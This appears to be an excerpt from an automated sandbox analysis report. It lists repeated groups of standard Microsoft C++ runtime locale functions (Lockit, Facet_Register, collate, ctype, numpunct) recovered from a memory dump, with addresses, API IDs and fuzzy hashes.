                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7B52
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7B5C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7B73
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B96
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7BAD
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7BCD
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7BDA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F70D8
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F70E2
                                                                                                                                  • int.LIBCPMT ref: 6E8F70F9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F711C
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7133
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7153
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7160
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7043
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F704D
                                                                                                                                  • int.LIBCPMT ref: 6E8F7064
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F7087
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F709E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F70BE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F70CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7202
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F720C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7223
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F7246
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F725D
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F727D
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F728A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F716D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7177
                                                                                                                                  • int.LIBCPMT ref: 6E8F718E
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F71B1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F71C8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F71E8
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F71F5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6E8FE172
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1DB
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1ED
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE205
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE215
                                                                                                                                  • _Getvals.LIBCPMT ref: 6E8FE237
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68BB
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3549167292-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F74EB
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F74F5
                                                                                                                                  • int.LIBCPMT ref: 6E8F750C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7546
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7566
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7573
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C08
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1C12
                                                                                                                                  • int.LIBCPMT ref: 6E8F1C29
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1C63
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1C83
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1C90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905434
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90543E
                                                                                                                                  • int.LIBCPMT ref: 6E905455
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90548F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9054AF
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9054BC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7456
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7460
                                                                                                                                  • int.LIBCPMT ref: 6E8F7477
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F74B1
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F74D1
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F74DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 69a908fb878165c8ffad0055af2bee8568e35e440cdc7bcd946674bd97c6edb6
                                                                                                                                  • Instruction ID: 2faab873dd4532f43786987a34caeb2c1b898982d612ab398ee881bbfa47b377
                                                                                                                                  • Opcode Fuzzy Hash: 69a908fb878165c8ffad0055af2bee8568e35e440cdc7bcd946674bd97c6edb6
                                                                                                                                  • Instruction Fuzzy Hash: 6E010031900629DBCF01DBE8C9546EE7B7ABF917A8F200C19E410BB2C0DF75994B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7C7C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7C86
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C9D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7CD7
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7CF7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D04
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 681e0eba1d5ddadcbc0d80fecb081a90cc4f3dd7994a56ac0c0bf4d3fe245d21
                                                                                                                                  • Instruction ID: 3b750ac5f0521b78b7964e6faffb0a07d4eedf327a077002df17b1faa24f84c4
                                                                                                                                  • Opcode Fuzzy Hash: 681e0eba1d5ddadcbc0d80fecb081a90cc4f3dd7994a56ac0c0bf4d3fe245d21
                                                                                                                                  • Instruction Fuzzy Hash: BB01D671900616DBCF01DBE8C554AED7B796F85398F110D09D8106B2C0DF749A4BCB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9055F3
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9055FD
                                                                                                                                  • int.LIBCPMT ref: 6E905614
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90564E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90566E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E90567B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1e91871c5d3a3bfdd581383a6af938c3a46e51f9c7985a221810848d4a84316c
                                                                                                                                  • Instruction ID: 5c9c982138a02d9ea60e3df29f58f4abac5ed075490652780e9742afde9798e3
                                                                                                                                  • Opcode Fuzzy Hash: 1e91871c5d3a3bfdd581383a6af938c3a46e51f9c7985a221810848d4a84316c
                                                                                                                                  • Instruction Fuzzy Hash: EC01C031900A19CBCB01DBE8C954AED777AAF95768F540D0DD410AB2D0DF74D9478B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7D11
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7D1B
                                                                                                                                  • int.LIBCPMT ref: 6E8F7D32
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7D6C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7D8C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: bd63205533edd6f4b850c4a434120208f6764dd55c1d45360a12c5e0f0401939
                                                                                                                                  • Instruction ID: 754441454ffdcce11edbdf5973a80b12380b1481401f2f19d5bd2b6402722df7
                                                                                                                                  • Opcode Fuzzy Hash: bd63205533edd6f4b850c4a434120208f6764dd55c1d45360a12c5e0f0401939
                                                                                                                                  • Instruction Fuzzy Hash: 5D01AD7591061ADBDB02EBE8C8546FD7779AF85398F600E09D4116B2C0DB74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7580
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F758A
                                                                                                                                  • int.LIBCPMT ref: 6E8F75A1
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F75DB
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F75FB
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7608
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2398042ed61fe7a42c04db38213ada4e534ae55af2cc044f9306c9529c3d5e02
                                                                                                                                  • Instruction ID: adac9e9d02c415bfa1da94608cddf526ebe83463a9d13019bb77094e22f0509e
                                                                                                                                  • Opcode Fuzzy Hash: 2398042ed61fe7a42c04db38213ada4e534ae55af2cc044f9306c9529c3d5e02
                                                                                                                                  • Instruction Fuzzy Hash: C701003190061ACBCF01DFE8C8446EDBB7AAF85399F104D19D4206B2C0DF74DA0B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7A28
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7A32
                                                                                                                                  • int.LIBCPMT ref: 6E8F7A49
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7A83
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7AA3
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7AB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 5cae0b53ed271250d80a834b566ee1a0e8df5bcd9d994e3ea8ea69ce948a3b98
                                                                                                                                  • Instruction ID: f2cae7bac51491897d6804430f88878f2784499b1103424d8335ea1b7ea5f6c9
                                                                                                                                  • Opcode Fuzzy Hash: 5cae0b53ed271250d80a834b566ee1a0e8df5bcd9d994e3ea8ea69ce948a3b98
                                                                                                                                  • Instruction Fuzzy Hash: DF01C431900616DBDB01DBE8C8546EE7B79AF85394F110D09E4116B2C0DF749A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90539F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9053A9
                                                                                                                                  • int.LIBCPMT ref: 6E9053C0
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9053FA
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90541A
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: b61b374049b54f1ebf213b984e254982e0aeef67177dbee761b21b72765117ce
                                                                                                                                  • Instruction ID: 358e915231c67d732a471a774b7cf4508512ed95c458f85b2a1d668df016cf7e
                                                                                                                                  • Opcode Fuzzy Hash: b61b374049b54f1ebf213b984e254982e0aeef67177dbee761b21b72765117ce
                                                                                                                                  • Instruction Fuzzy Hash: DC01AD71904619DBCF11DBE8C854AED7779AF95368F604D0DD410AB280DB74DD46CB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F73C1
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F73CB
                                                                                                                                  • int.LIBCPMT ref: 6E8F73E2
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F741C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F743C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7449
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 1bf115f5b73969ad213d1fe5ed95a436d707bdc652bd1d07581d9e2c5786ba2c
                                                                                                                                  • Instruction ID: 782399bd0ad5c3cbcb3ad7450edbb73f958966701449313e0df90b736cd0c7d0
                                                                                                                                  • Opcode Fuzzy Hash: 1bf115f5b73969ad213d1fe5ed95a436d707bdc652bd1d07581d9e2c5786ba2c
                                                                                                                                  • Instruction Fuzzy Hash: 0C01C07190061ADBCF01DFE8C954AEE7B79AF95398F204D09D810AB2D0DF74DA4B9B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7BE7
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7BF1
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C08
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7C42
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7C62
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7C6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1B73
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1B7D
                                                                                                                                  • int.LIBCPMT ref: 6E8F1B94
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1BCE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1BEE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F78FE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7908
                                                                                                                                  • int.LIBCPMT ref: 6E8F791F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7959
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7979
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7986
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7869
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7873
                                                                                                                                  • int.LIBCPMT ref: 6E8F788A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F78C4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F78E4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F78F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
